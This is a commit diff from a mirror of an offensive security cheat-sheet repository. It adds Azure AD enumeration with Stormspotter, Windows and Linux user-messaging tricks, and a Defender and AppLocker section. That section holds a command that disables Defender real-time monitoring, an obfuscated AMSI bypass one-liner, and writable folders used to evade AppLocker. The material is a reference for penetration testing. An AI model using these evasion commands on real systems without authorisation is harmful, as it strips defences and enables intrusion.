mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Misc & Tricks Page + AMSI + Defender
This commit is contained in:
parent
81655945f9
commit
c1731041b5
3 changed files with 81 additions and 3 deletions
|
@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
|
|||
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
|
||||
```
|
||||
|
||||
Stormspotter, graphing Azure and Azure Active Directory objects
|
||||
|
||||
```powershell
|
||||
$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
|
||||
git clone https://github.com/Azure/Stormspotter
|
||||
cd Stormspotter
|
||||
pipenv install .
|
||||
stormspotter --cli
|
||||
stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
|
||||
Browse to http://127.0.0.1:8050 to interact with the graph.
|
||||
```
|
||||
|
||||
Other interesting commands to enumerate Azure AD.
|
||||
|
||||
```powershell
|
||||
# Azure AD powershell module
|
||||
|
@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
|
|||
## References
|
||||
|
||||
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
|
||||
* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
||||
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
||||
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
|
||||
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
||||
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
|
||||
|
|
17
Methodology and Resources/Miscellaneous - Tricks.md
Normal file
17
Methodology and Resources/Miscellaneous - Tricks.md
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Miscellaneous & Tricks
|
||||
|
||||
All the tricks that couldn't be classified somewhere else.
|
||||
|
||||
## Send a message to another user
|
||||
|
||||
```powershell
|
||||
# Windows
|
||||
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
|
||||
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
|
||||
|
||||
# Linux
|
||||
$ wall "Stop messing with the XXX service !"
|
||||
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
|
||||
$ who
|
||||
$ write root pts/2 # press Ctrl+D after typing the message.
|
||||
```
|
|
@ -6,7 +6,11 @@
|
|||
* [Windows Version and Configuration](#windows-version-and-configuration)
|
||||
* [User Enumeration](#user-enumeration)
|
||||
* [Network Enumeration](#network-enumeration)
|
||||
* [AppLocker Enumeration](#applocker-enumeration)
|
||||
* [Antivirus & Detections](#antivirus--detections)
|
||||
* [Windows Defender](#windows-defender)
|
||||
* [AppLocker Enumeration](#applocker-enumeration)
|
||||
* [Powershell](#powershell)
|
||||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||
* [Search for file contents](#search-for-file-contents)
|
||||
|
@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
|||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
```
|
||||
|
||||
## AppLocker Enumeration
|
||||
## Antivirus & Detections
|
||||
|
||||
### Windows Defender
|
||||
|
||||
```powershell
|
||||
# check status of Defender
|
||||
PS C:\> Get-MpComputerStatus
|
||||
|
||||
# disable Real Time Monitoring
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
```
|
||||
|
||||
### AppLocker Enumeration
|
||||
|
||||
- With the GPO
|
||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
List AppLocker rules
|
||||
|
||||
```powershell
|
||||
PS C:\> $a = Get-ApplockerPolicy -effective
|
||||
PS C:\> $a.rulecollections
|
||||
```
|
||||
|
||||
### Powershell
|
||||
|
||||
Default powershell locations in a Windows system.
|
||||
|
||||
```powershell
|
||||
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
Example of AMSI Bypass.
|
||||
|
||||
```powershell
|
||||
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
|
||||
### Default Writeable Folders
|
||||
|
||||
```powershell
|
||||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\windows\tracing
|
||||
```
|
||||
|
||||
## EoP - Looting for passwords
|
||||
|
||||
### SAM and SYSTEM files
|
||||
|
|
Loading…
Reference in a new issue